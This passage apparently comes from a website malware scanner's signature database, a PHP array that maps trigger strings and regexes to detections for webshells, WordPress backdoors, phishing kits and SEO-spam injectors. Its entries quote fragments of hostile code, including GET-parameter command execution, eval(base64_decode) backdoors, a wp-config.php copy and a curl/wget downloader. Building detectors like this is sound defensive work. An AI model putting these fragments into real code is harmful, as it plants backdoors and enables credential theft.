	';$b374k=$func(\'$x\',\'ev' => array(STR_CLEAR_LINEMATCH, 'php.malware.create_function.010', '\$[\w]+=[creat_funio\."]{20,};[\s]*\$b374k=\$[\w]+\([^\)]+\)+;.\);[\s]*\$b374k\([^\)]+\);'),
	'$b374k = $func(' => array(STR_CLEARFILE, 'php.backdoor.b374k-shell.013', NULL),
	'b374k shell' => array(STR_CLEARFILE, 'php.backdoor.b374k-shell.016', NULL),
	'\'b374k\'' => array(STR_CLEARFILE, 'php.backdoor.b374k-shell.016.02', NULL),
	'console.log(\'b374k> \'+str);' => array(STR_CLEARFILE, 'js.malware.b374k-shell.001', NULL),
	'{[|b374k|]}' => array(STR_CLEARFILE, 'php.backdoor.b374k-shell.016.03', NULL),
),

'touch(' => array(STR_TRIGGER,

	'if (md5' => array(STR_TRIGGER,
		'isset($_REQUEST[cmd]' => array(STR_TRIGGER,
			'file_put_contents("$name",$a);' => array(STR_CLEARFILE, 'php.backdoor.uploader.054', NULL),
		),
	),

	'chmod(dirname(__FILE__), 0351);' => array(STR_TRIGGER,
		'$time = filemtime($_SERVER[\'DOCUMENT_ROOT\']."/".$files[$i]);' => array(STR_CLEARFILE, 'php.malware.unreadable_dir.001', NULL),
	),

	'if (!is_file(\'html.zip\')) die(\'fail\');' => array(STR_TRIGGER,
		'if ($mess == \'load\' and $file) {' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.017', NULL),
	),

	'$web = str_replace(\'www.\',\'\',$_SERVER[\'HTTP_HOST\']);' => array(STR_TRIGGER,
		'$zip->addFile(\'index.txt\');' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.045', NULL),
	),

	'touch($cache_indexes, strtotime($date));' => array(STR_CLEARFILE, 'php.spam-seo.injector.042', NULL),
	'touch($htaccess, mktime(12, 17, 11, 12, 31, 2013));' => array(STR_CLEARFILE, 'php.spam-seo.stylesshets_com.002',NULL),
	'class LLM_client extends LLM_base {' => array(STR_CLEARFILE, 'php.spam-seo.linksuite.001', NULL),
	'print_err("IframeFileDynamic(): inject data_before failed pos=$inject_pos");' => array(STR_CLEARFILE, 'php.spam-seo.injector.023', NULL),
	'if (!file_exists($UpFN)) die("No API");' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.008', NULL),
	'elseif (($new_html = __smart_inject($new_html, $materials)) === false) {' => array(STR_CLEARFILE, 'php.spam-seo.injector.145', NULL),
	'$_COOKIE["\x66\162\157\156\x74\x65\x6e\x64"]; goto' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.072', 'goto [\w]+;[\s]*[\w]+:[\s]*[\w]+[^\n]+\$_COOKIE\["\\\\x66\\\\162\\\\157\\\\156\\\\x74\\\\x65\\\\x6e\\\\x64"\];[^\n]+}'),
	'str_replace("define(\'DISALLOW_FILE_MODS\', true);",""' => array(STR_CLEARFILE, 'php.hacktool.wp_attacker.005', NULL),
),

'.com' => array(STR_TRIGGER,

	'cp ' => array(STR_TRIGGER,
		'/wp-config.php 13.txt;' => array(STR_CLEARFILE, 'sh.malware.component.001', NULL),
		'cp wp-system.php /' => array(STR_CLEARFILE, 'sh.malware.component.001.02', NULL),
	),

	'netease/email.163.com.htm' => array(STR_CLEARFILE, 'php.spam-seo.generic.012', NULL),
	/*replicas - created for ftp.championsway.com*/
	'1140696640@qq.com' => array(STR_CLEARFILE, 'php.spam-seo.replicas.001', NULL),
	'p.shuju2011.com' => array(STR_CLEARFILE, 'html.spam-seo.generic.004', NULL),
	'$google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";' => array(STR_CLEARFILE, 'php.hacktool.sqliscanner.001.002', NULL),
	'http://shorthere.com/' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.37', NULL),
	'DR_Yassine' => array(STR_CLEARFILE, 'php.phishing.generic.019', NULL),
	'# security-lab1.juniper.net ' => array(STR_CLEARFILE, 'htaccess.phishing.block_bots.004', NULL),
	'2015 Nikkei Business Publications, Inc. All Rights Reserved.</div>' => array(STR_CLEARFILE, 'php.spam-seo.japanese-spam.005', NULL),
	'$contents = @get_data_l().$contents;' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.158.02', '\\$contents = @get_data_l...\\$contents;'),
	'Facebook: facebook.com/Ex.Robotos' => array(STR_CLEARFILE, 'php.phishing.office365.003', NULL),
),

'Amazon' => array(STR_TRIGGER,

	'Do you have an Amazon.com password?</b>' => array(STR_TRIGGER,
		'href="https://www.amazon.com/gp/css/account/forgot-password/email.html' => array(STR_CLEARFILE, 'html.phishing.amazon.005', NULL),
	),

	'<title>Amazon Billing Center' => array(STR_CLEARFILE, 'html.phishing.amazon.001', NULL),
	'<title>Amazon.com - Your Account</title>' => array(STR_CLEARFILE, 'html.phishing.amazon.004', NULL),
	'onsubmit="var test1 = apCheckRequiredFields(\'ap_signin_form\', [\'ap_email\',\'ap_password\']);' => array(STR_CLEARFILE, 'html.phishing.amazon.002', NULL),
	'?action=billing_login=true&_session;".md5(time()).md5(time()); ?>' => array(STR_CLEARFILE, 'php.phishing.amazon.001', NULL),
	'<div id="ap_signin1a_forgot_password_row"' => array(STR_CLEARFILE, 'html.phishing.amazon.003', NULL),
	'Please enter your Amazon Password' => array(STR_CLEARFILE, 'html.phishing.amazon.006', NULL),
	'$cardnumber|$newCreditCardMonth|$newCreditCardYear|$cvv' => array(STR_CLEARFILE, 'php.phishing.amazon.003', NULL),
	'alert("Invalid Card number. Please check your entry.")' => array(STR_CLEARFILE, 'html.phishing.amazon.006.02', NULL),
	'verification&securessl=true&sessionid=<?php  echo generateRandomString(' => array(STR_CLEARFILE, 'php.phishing.amazon.004', NULL),
	'Amazon.com Inc or its affiliates</span>' => array(STR_CLEARFILE, 'html.phishing.amazon.007', NULL),
	'<title>Amazon Sign ln</title>' => array(STR_CLEARFILE, 'html.phishing.amazon.008', NULL),
),

'<HTML' => array(STR_TRIGGER,

	'>Mystery Shoppers' => array(STR_TRIGGER,
		'method=post action=' => array(STR_CLEARFILE, 'html.phishing.mysteryshoppers.001', NULL),
	),

	'netflix' => array(STR_TRIGGER,
		'>Autentisering' => array(STR_CLEARFILE, 'html.phishing.netflix.007', NULL),
	),

	'unitel.co.kr' => array(STR_TRIGGER,
		'&#47196;&#44536;&#51064;' => array(STR_CLEARFILE, 'html.phishing.email_account.003', NULL),
	),

	'<HEAD><TITLE>Synchronizing.' => array(STR_CLEARFILE, 'html.phishing.generic.050', NULL),
	'https://onlinebanking.mandtbank.com/layouts/RetailStyle.css' => array(STR_CLEARFILE, 'html.phishing.matbank.001.002', NULL),
	'<TITLE>Discover Card: Cardmember Verification Page</TITLE>' => array(STR_CLEARFILE, 'html.phishing.discovery.001', NULL),
	'<TITLE>COMCAST Webmail</TITLE>' => array(STR_CLEARFILE, 'html.phishing.comcast.001', NULL),
	'<TITLE>HiNet' => array(STR_CLEARFILE, 'html.phishing.generic.030', NULL),
	'isProvided(formElem)' => array(STR_CLEARFILE, 'html.phishing.mysteryshoppers.001.02', NULL), 
	'>To help keep you safe, we required an extra security challenge. You will need to verify your' => array(STR_CLEARFILE, 'html.phishing.generic.065', NULL),
	'<TITLE>Aol Billing Center' => array(STR_CLEARFILE, 'html.phishing.aol.006', NULL),
),

'print' => array(STR_TRIGGER,

	'^ ord($_' => array(STR_TRIGGER,
		'YmFzZTY0X2RlY29kZShhcnJheV9zaGlmdCgk' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.085', NULL),
	),

	'print "httpflood from irc\n";' => array(STR_CLEARFILE, 'pl.backdoor.webshell.005', NULL),
	'print "<tr><td><b>wtf:</b></td><td>$UserID</td></tr>";' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.030', NULL),
	'<?php print "$site?$kverya"; ?>' => array(STR_CLEARFILE, 'php.backdoor.MagicIncludeShell.001.001', NULL),
	'$dirok="\e[33m[+]\e[m Ok, Diretory that wanna be Massdeface' => array(STR_CLEARFILE, 'pl.hacktool.defacer_script.001', NULL),
	'target + "?q=user/password&" + payload' => array(STR_CLEARFILE, 'py.hacktool.drupal_exploit.001', NULL),
	';if(isset($_GET[1])){$_=$_GET;$_[1]($_[2]);exit;}' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.file_put_contents.002', '(?:file_put_contents\([\'"][^,]+,\s*[\'"]\s*<\?php\s*)?print\s*\w+\s*;\s*if\(isset\(\$_GET\[\d\]\)\)\s*{\s*\$_=\s*\$_GET\s*;\s*\$_\[\d\]\s*\(\$_\[\d\]\)\s*;\s*exit\s*;\s*}(?:\s*[\'"]\s*\)\s*;\s*\/\*[\'"]\s*\)\s*;)?'),
	'data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvc' => array(STR_CLEARFILE, 'py.hacktool.generic_exploit.002', NULL),
	'if curl $1 > $2; then echo \'curl success\'; else wget $1 -O $2; fi;' => array(STR_CLEARFILE, 'sh.backdoor.uploader.005', NULL),
	'print(\'<a href="\'.myurls().\'">\'.get_anchor' => array(STR_CLEARFILE, 'php.spam-seo.links-donor.003', NULL),
	'node32linux > nodejs' => array(STR_CLEARFILE, 'sh.hacktool.roguejs.001', NULL),
),

'cook' => array(STR_TRIGGER,

	'die();' => array(STR_TRIGGER,

		'$users = get_users(array(\'role\' => \'administrator\'));' => array(STR_TRIGGER,
			'require(\'./wp-blog-header.php\');' => array(STR_TRIGGER,
				'echo \'WordPress Login Successful' => array(STR_CLEARFILE, 'php.backdoor.wp-admin_bypass.006', NULL),
			),
		),

		');header("Location:' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.cookie.004', 'if\(!isset\(\$_COOKIE\[.(\w+).\]\)\)\{setcookie\(.\1.,.\d+.,time\(\)\+\d+\*\d+\*\d+\);header\(.Location:\s*[htps]{4,5}:[^\?]+\?key=\w+.\);die\(\);\};'),
	),

	'onsubmit=\"document.cookie=\'key=\'+encodeURIComponent(this[0].value)' => array(STR_TRIGGER,
		'}["key"])){$' => array(STR_TRIGGER,
			'};unset\x28\x24' => array(STR_CLEAR_MULTIMATCH, 'php.malware.obfuscated.036', '\$[\w]+=.([A-Za-z0-9+\/=]+[\s]*)*(==)?.;[\s]*\$[\w]+[^\{]+if\(!(?i)empty(?-i)\(\$\{\$[\w]+\}\[.[\w]+.\]\)\)\{\$[\w]+=\$\{\$[\w]+\}\[.[\w]+.\];\$[\w]+=(?i)strlen(?-i)\(\$[\w]+\);[^\>]+\{.\);\}\}[\s]*(?i)die(?-i)\([^;]+data:;base64,[^;]+form><\/body><\/html>.\);'),
		),
	),

	'<?php setcookie("' => array(STR_TRIGGER, 
		'", 2, time()+999999999, "/");?>' => array(STR_CLEARFILE, 'php.malware.component.001', NULL),
	),

	'function getCookie' => array(STR_TRIGGER,
		'cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write(\'<script src="\'+src+\'"><\/script>\')}' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.052', 'function getCookie\([\w]+\)[\s]*\{[\s]*var [\w]+[\s]*=[\s]*document\.cookie\.match[^\n]+document\.write\(.<script[^\)]+\)[\s]*\}[\s]*'),
	),

	'$_COOKIE[$cookiename] != $passw' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.022', NULL),
	'setcookie(\'password\', SHELL_PASSWORD, time()' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.074', NULL),
	'setcookie(\'admin_spiderpass'=> array(STR_CLEARFILE, 'php.backdoor.spidershell.003', NULL),
	'function lovesetcookie(' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.062', NULL),
	'4cookey' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.cookey.001',  '<\?php\s+%\w+cookey[^\>]+preg%\w+replace%\w+%[^>]+\?>'),
),

'door' => array(STR_TRIGGER,
	
	'ineedthispage=yes' => array(STR_TRIGGER,
		'servurl' => array(STR_TRIGGER,
	
			'$newclient = $new_request->request("http' => array(STR_TRIGGER,
				'HttpRequest($useCurl' => array(STR_CLEARFILE, 'php.spam-seo.doorway-ineed.002', NULL),
			),

			'gzcompress(base64_encode' => array(STR_TRIGGER,
				'gzuncompress(urldecode' => array(STR_CLEARFILE, 'php.spam-seo.doorway-ineed.003', NULL),
			),

			'function placeLinks' => array(STR_TRIGGER,
				'$curr' => array(STR_CLEARFILE, 'php.spam-seo.doorway-ineed.004', NULL),
			),

			'<\?php[\s]*if[\s]*\(+empty\(\$_GET\[.ineedthispage' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-ineed.001', 'if[\s]*\(+empty\(\$_GET\[.ineedthispage[^\x02]+\$item->alias;[\s]*\}[\s]*;?(function full_del_dir[^>]+rmdir\([^;]+;[\s]*\}[\s]*;)?'),
		),
	),

	'$this->door_url' => array(STR_TRIGGER,
		'$content;}function detect_bot(){$bot=FALSE;if(@preg_match' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.doorway-gen.078', 'if\(!class_exists\([^\)]+\)\)[\s]*\{[\s]*if\(function_exists\(.is_user_logged_in.\)\)\{[^\]]+\]\)\)\{die\(pi[^<]+@strtolower[^#]+#\$ip#[^\*]+->init\(\$[\w]+,[\s]*\$host,[\s]*\$is_bot\);\}'),
	),

	'doorway' => array(STR_TRIGGER,
		'codetodonor' => array(STR_CLEARFILE, 'php.spam-seo.injector.256.04', NULL),
	),

	'thisdoorwayurl=\"&clurl=\".trim(\$thisdoorwayurl);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.014', NULL),
	'{door-home}\',\'{donor-home}' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.065', NULL),
	'Back Backdoor' => array(STR_CLEARFILE, 'pl.backdoor.connectback.001', NULL),
),

'ellsfargo' => array(STR_TRIGGER,

	'HTTP-EQUIV="Refresh" CONTENT="1;URL=' => array(STR_TRIGGER,
		'lease wait while we verify your identity...</span>' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.004', NULL),
	),

	'Fargo Sign On</title' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.004.02', NULL),
	'Wells Fargo Security Measures' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.001', NULL),
	'Wells Fargo Sign On to View Your Busines' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.001.002', NULL),
	'message .= "---:||Wellsfargo' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.001.003', NULL),
	'HTTP-EQUIV="Refresh" CONTENT="1;URL=https://www.wellsfargo.com"' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.001.004', NULL),
	'<div class="titlePassword">Wells Fargo Accounts Verification</div>' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.002', NULL),
	'form autocomplete="off" name="signon" id="frmSignon" action="wellsfargo.php' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.002.003', NULL),
	'Wells Fargo. All rights reserved' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.008', NULL),
),

'_option' => array(STR_TRIGGER,

	'@$' => array(STR_TRIGGER,
		'null' => array(STR_TRIGGER,
			'isset' => array(STR_TRIGGER,
				'get_option' => array(STR_TRIGGER,
					'(\$[\w]+)[\s]*=[\s]*get_option\(.[\w]+.[\s]*\);[\s]*if[\s]*\([\s]*isset[\s]*\([\s]*\1\[.[\w]+.\][\)\s]+@\1\[.[\w]+.\]\([\s]*null' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.dbload.006', '(\$[\w]+)[\s]*=[\s]*get_option\(.[\w]+.[\s]*\);[\s]*if[\s]*\([\s]*isset[\s]*\([\s]*\1\[.[\w]+.\][\)\s]+@\1\[.[\w]+.\]\([\s]*null[\s]*,[\s]*\1\[[^\]]+\]\(\1[^;]+;'),
				),
			),
		),
	),

	'_cfg_popuplink' => array(STR_TRIGGER,
		'\'url\' => \'http://tiny.cc' => array(STR_CLEARFILE, 'php.malware.component.018', NULL),
	),

	'(ge\'.\'t_option(' => array(STR_CLEAR_LINEMATCH,'php.backdoor.dbload.002', '\\$([\\w]+)[\\s]*=[\\s]*[\'_.preglace]+;[\\s]*\\$\\1\\([^<]+\\);'),
	'get_option("_is_widget_active_")' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.wp_worm.001', 'function _[\w]+widgets?\(\)\{[\s]*\$[\w]+=substr\(file_get_contents\(__FILE__\),strripos\(file_get_contents\(__FILE__\)[^>]+\?.\s*\..>[^&]+\$output \.= \(\$[^}]+\}[\s]*\}[\s]*\}[\s]*\}[\s]*return \$output;[\s]*\}[^\^]+function _[^\{]+items=array\(\)\)\{[\s]*\$places=array_shift\(\$[^;]+;[\s]*if\(substr\(\$places[^\^]+\$output \.= \$before \.[^;]+\$after;[\s]*\}[\s]*return[\s]*\$output;[\s]*\}'), //modified by PG
	'$social_filename = __DIR__ .\'/social.png\';' => array(STR_CLEARFILE, 'php.backdoor.cryptoPHP.001', NULL),
	'$af(~$b6d(' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.linkwithin.001', 'if .!function_exists\(.m_c.\)\)\s*\{\s*function m_c[^\}]+\$af\(~\$b6d\([^>]+m_c.-1.;\s*\}'),
	'<?php eval(get_option("\x' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_get_option.002', '<\?php eval.get_option\(.\\\x[^\)]+\)\);\s*\?>'),
	'function wp_custom_page_links_return' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_get_option.003', 'function wp_custom_page_links_return..\s*\{\s*\$\w+ = get_option\([^\)]+\);\s*\@eval\(\$\w+\);\s*\}\s*\@eval.get_option\([^\)]+\)\);'),
),

'mysql' => array(STR_TRIGGER,

	'tblregistrars' => array(STR_TRIGGER,
		'Cilent CC' => array(STR_CLEARFILE, 'php.hacktool.whmcsexp.002', NULL),
		'href="?Clientsr00ts">' => array(STR_CLEARFILE, 'php.hacktool.whmcsexp.002.02', NULL),
	),

	'die(' => array(STR_TRIGGER,
		'echo "Database ".DB_NAME." was successfully dropped' => array(STR_CLEARFILE, 'php.hacktool.mysql_drop.002', NULL),
	),
	
	'setcookie( "mysql_web_admin_password"' => array(STR_TRIGGER,
		'ini_get' => array(STR_CLEARFILE, 'php.hacktool.mysql_shell.001', NULL),
	),

	'[\'card_expiration\']."<' => array(STR_TRIGGER,
		'$pass=explode("\'_DB_PASSWD_\', ",$' => array(STR_CLEARFILE, 'php.hacktool.prestashop_cc_stealer.001', NULL),
	),

	'get_random_name()' => array(STR_TRIGGER,
		'$wp_cfgs = $joomla_cfgs = array();' => array(STR_CLEARFILE, 'php.backdoor.wp_adminadd.006', NULL),
	),

	'WP MASS</title>' => array(STR_CLEARFILE, 'php.hacktool.massdeface.001', NULL),
	'class ShopSearcher extends ScannerOfDomination' => array(STR_CLEARFILE, 'php.hacktool.shopsearcher.001', NULL),
),

'aWYgKC' => array(STR_TRIGGER,

	'eval\(\$' => array(STR_TRIGGER,
		'="";foreach($' => array(STR_CLEAR_LINEMATCH, 'php.malware.counterGAGA.001', '\/\*\s*([\w\-\_]+)\s*\*\/[^\n\r]+eval\(\$[^\n\r]+"\)\);\'\);\s*\/\*\s\/\1\s*\*\/'),
	),

	'ok>ini_ok' => array(STR_CLEARFILE, 'php.backdoor.webshell.017', NULL),
	'Priv8' => array(STR_CLEARFILE, 'php.backdoor.webshell.012', NULL),
	'r57' => array(STR_CLEARFILE, 'php.backdoor.r57-shell.003', NULL),
	'<b>Host Target:</b>' => array(STR_CLEARFILE, 'php.backdoor.webshell.013', NULL),
	'eval(base64_decode($lang));' => array(STR_CLEARFILE, 'php.backdoor.webshell.014', NULL),
	'/* SYSTEM */ eval(base64_decode("IGV' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.webshell.015', '.\*\s*SYSTEM\s*\*.\s*eval\(base64_decode\("IGVy[^;]+;\s*.\*[^\*]+SYSTEM\s*\*.'),
	'$_SESSION[\'nst\']="$pass";' => array(STR_CLEARFILE, 'php.backdoor.webshell.016', NULL),
),

'link' => array(STR_TRIGGER,

	'rmdir($dir' => array(STR_TRIGGER,
		'if (is_dir($dir' => array(STR_TRIGGER,

			'function rrmdir($dir)' => array(STR_CHAIN_TRIGGER,
				'$dir = getcwd();' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.mass-delete.003', 'chdir\([^\)]+\)\s*;\s*\$\w+\s*=\s*getcwd\(\)\s*;\s*'),
				'$directory = $_REQUEST[\'action\'];' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.fulldeldir.002', 'function rrmdir\(\$dir\)[\s]*\{[\s]*if[\s]*\(is_dir\(\$dir\)\)[\s]*\{[\s]*\$objects[^>]+rmdir\(\$dir\);[\s\}]+(\$directory = \$_REQUEST[^;]+;[\s]*rrmdir\([^;]+;|\$files = scandir[^}]+[\s\}]+)'),
				'unlink(getcwd()' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.fulldeldir.004', '\$[\w]*[\s]*=[\s]*glob\(getcwd\(\)[^\}]+\}[\s]*else[\s]*\{[\s]*rrmdir\(\$[\w]+\);[\s]*\}[\s]*\}[\s]*else[\s]*if\(is_file\(\$[\w]+\)\)[\s]*\{[\s]*if\(\$[\w]+==getcwd\(\)[^&]+&&[\s]*\$[\w]+[\s]*!=[\s]*.\.\..\)[\s]*\{[\s]*if[\s]*\(is_dir\(\$[\w]+[^\}]+\}[\s]*\}[\s]*rmdir\(\$[\w]+\);[\s]*\}[\s]*\}[\s]*print[\s]*.([\w]+[\s]*)*.;'),
			),

			'if($_GET["error"] == "Yes"){' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.fulldeldir.002.02', 'function\s*(\w+)\(\$\w+\)\s*{\s*if\s*\(is_dir\((\$\w+)\s*\)\)\s*{?\s*(\$\w+)\s*=\s*(?:open|scan)dir\(\2\)\s*;\s*(?:if|foreach)\s*\(\!?\3[^{]+{\s*if\s*\(\$\w+\s*\!=\s*[\'"]\.[\'"]\s*&+\s*\$\w+\s*\!=\s*[\'"]\.\.[\'"]\)\s*{[^\2]+else\s*(?:unlink|\1)\s*\(\s*\2\.[\'"]\/[\'"]\.\$\w+\s*\)\s*;\s*}\s*}\s*(?:reset|closedir)\s*\(\s*\3\s*\)\s*;\s*rmdir\(\2\)[^}]+}\s*}?\s*(?:if\(\$_GET\[[\'"]\w+[\'"]\]\s*==\s*[\'"]\w+[\'"]\)\s*{\s*(\$\w+)\s*=\s*dirname\(__FILE__\)\s*;|\s*(\$\w+)\s*=\s*\$_REQUEST\[[\'"]\w+[\'"]\]\s*;)\s*\1\((?:\4|\5)\)\s*;(\s*})?'),
		),
	),

	'unlink($file);' => array(STR_TRIGGER,
		'$files = glob(\'../../public_html/*' => array(STR_CLEARFILE, 'php.hacktool.fulldeldir.003', NULL),
	),

	'$dz2d = "sql.php";' => array(STR_TRIGGER,
		'unlink($filename); ' => array(STR_CLEARFILE, 'php.malware.component.016', NULL),
	),

	'function ahrefs_chooselinks($links, &$ah) {' => array(STR_CLEARFILE, 'php.spam-seo.injector.071', NULL),
),

'SAPE' => array(STR_TRIGGER,

	'_SAPE_USER' => array(STR_TRIGGER,

		'/\'._SAPE_USER.\'/' => array(STR_TRIGGER,

			'$text = @$args[\'block\'] ?' => array(STR_TRIGGER,
				'_SAPE_USER\', $this->settings->user );' => array(STR_CLEARFILE, 'php.hacktool.SAPE.001.12', NULL),
			),

			'echo $sape_articles->process_request();' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.SAPE.001.05', 'define\(\'_SAPE_USER\'[^>]+echo \$sape_articles->process_request\(\);'),
			'echo $client_lnk->build_links();' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.SAPE.001.07', '(?:(?:<\?php )?include[^;]+ip.php.;(?: ?\?>)?)(?:<\?php +)echo \$sape->return_links[^>]+mainlink.php[^>]+echo \$client_lnk->build_links\(\);[^;]+GetLinks\(\)\);(?:\?>)'),
			'/\'._SAPE_USER.\'/ML.php' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.SAPE.001.08', '(?:(?:<\?php )?include[^;]+ip.php.;(?: ?\?>\n?)?)(?:<\?php +)echo \$sape->return_links[^\?]+GetLinks\(\)\);(?:\?>)'),
		),

		'class LinkfeedClient {' => array(STR_TRIGGER,
			'class SAPE_base {' => array(STR_CLEARFILE, 'php.hacktool.SAPE.001.09', NULL),
		),

		'$sape = new SAPE_client' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.SAPE.002', '(?:<style>\s*?div\.[^<]+?<\/style>\s*?<div\s*?class\s*?=\s*?["\']\w+?["\']\s*?>\s*?)?(?:<\?php)?\s*(?:if \s*\(\!defined\(._SAPE_USER.\)\)\s*\{\s*)?define\(._SAPE_USER.[^>]+\$sape\s*=\s*new\s*SAPE_client\((?:\s*\$o\s*)?\);(?:[^>]+echo \$sape->return_block_links\(\);)?(?:[^\?]+\?>)?(?:\s*?<\/div>)?'),
		' = new SxGeo(' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.SAPE.001.11', '<\?php\s*include\([^\?]+ = new SxGeo\([^\?]+if \(!defined\(._SAPE_USER.\)\)\{define\(._SAPE_USER[^\}]+\}\}\}\s*\?>'),
	),

	'SAPE Code' => array(STR_TRIGGER,
		'FILE_TO_SAPE_EDIT_FIRST' => array(STR_CLEARFILE, 'php.hacktool.SAPE.001.10', NULL),
	),
),

'<meta' => array(STR_TRIGGER,

	'setTimeout(\'getgoing()\',1);' => array(STR_TRIGGER,
		'top.location="http:' => array(STR_TRIGGER,
			'.exe";' => array(STR_CLEARFILE, 'js.spam-seo.redirect.015', NULL),
		),
	),

	'if(!allowOnly(array(' => array(STR_TRIGGER,
		'; url=http://youjizz.com' => array(STR_CLEARFILE, 'php.spam-seo.redrect_youjizz.001', NULL),
	),

	'url=data:text/html;' => array(STR_TRIGGER,
		'preg_match(\'@(iPad|iPod|iPhone|Android' => array(STR_CLEARFILE, 'php.phishing.data_text_html.001', NULL),
	),

	'                                                                          <meta http-equiv="refresh" content=' => array(STR_CLEARFILE, 'html.redirect.http-Refresh_gen.002', NULL, 1),
	'<meta HTTP-Equiv="refresh" content="0; URL=<?' => array(STR_CLEARFILE, 'php.spam-seo.redirect_gen.001', NULL), 
	'<meta http-equiv=refresh content=\'0; url=".$url." \'>";exit()' => array(STR_CLEARFILE, 'php.spam-seo.redirect_gen.018', NULL),
	'content="1;url=http://safe-med' => array(STR_CLEARFILE, 'html.spam-seo.redirect.003', NULL, 1),
	'<meta name="keywords" content="nike air max' => array(STR_CLEARFILE, 'php.spam-seo.brands.002', NULL),
),

'.live.com' => array(STR_TRIGGER,

	'<title' => array(STR_TRIGGER,
		'<form' => array(STR_TRIGGER,
			'Password' => array(STR_TRIGGER,
				'mail.live.com' => array(STR_CLEARFILE, 'html.phishing.microsoft.026', NULL),
			),
		),
	),

	'" href="https://login.live.com/resetpw.srf?wreply=https://login.live.com/login.srf' => array(STR_CLEARFILE, 'html.phishing.hotmail.004', NULL),
	'<meta http-equiv="refresh" content="0;url=http://www.mail.live.com">' => array(STR_CLEARFILE, 'html.phishing.generic.015', NULL),
	'https://sc.imp.live.com/content/dam/imp/surfaces/mail_signin/header/logo_mail.png' => array(STR_CLEARFILE, 'php.phishing.hotmail.005', NULL),
	'type="image/vnd.microsoft.icon" href="http://microsoft-excel.' => array(STR_CLEARFILE, 'html.phishing.generic.039', NULL),
	']="A single Microsoft account gets you into <b>Hotmail<' => array(STR_CLEARFILE, 'js.phishing.microsoft.003', NULL),
	'type="image/vnd.microsoft.icon" href="http://microsoft-excel.' => array(STR_CLEARFILE, 'html.phishing.generic.039', NULL),
),

'domain' => array(STR_TRIGGER,

	'$body=file_get_contents("http://".$domain);' => array(STR_TRIGGER,
		'") OR strstr($ip,' => array(STR_CLEARFILE,'php.spam-seo.injector.134', NULL),
	),

	'UPLOAD_FILE_PATH' => array(STR_TRIGGER,
		'getcwd' => array(STR_CLEAR_MULTIMATCH,'php.hacktool.generic.022', 'define\(.UPLOAD_FILE_PATH.,[\s]*__DIR__[^;]+\);[\s]*function[\s]*[\w]+\(\$[\w]+\)[\s]*{[\s]*return[\s]*checkdnsrr\(\$[\w]+[\s]*,[\s]*...\);[\s]*\}[\s]*define\([^\{]+do[\s]*\{[\s]*print[\s]*getcwd\(\)[^\{]+\{[\s]*if\(is_valid_domain_name\(\$[\w]+\)[\s]*&&[\s]*strpos\(\$[\w]+,[^\}]+\}[\s]*\}[\s]*if\(!chdir\(.\.\..\)\)[\s]*\{[\s]*break;[\s]*\}[\s]*\$counter\+\+;[\s]*\}while\(\$counter[\s]*<[^\}]+basename\(UPLOAD_FILE_PATH\)[\s]*.[\s]*.\).n.;[\s]*\}[\s]*\}'),
	),

	'foreach($dirok as $temp' => array(STR_TRIGGER,
		'function GetDomains($' => array(STR_CLEARFILE, 'php.spam-seo.injector.268', NULL),
	),

	'!== false || stripos($domain_check,' => array(STR_TRIGGER,
		'$domain_check = \'@\'.strtolower($domain' => array(STR_CLEARFILE, 'php.phishing.script.029.02', NULL),
	),

	'if (empty($__var_to_echo) && empty($remote_domain)) {' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.026','if .empty..([\\w]+)[^>]+substr.trim.._SERVER..REMOTE_ADDR[^>]+@ini_set..display_errors[^<]+__var_to_echo[^>]+__url_get_contents..\\1[^}]+echo .__var_to_echo;[\\s]*}'),
	'$maindomain = "desoupline.com";' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.006', NULL),
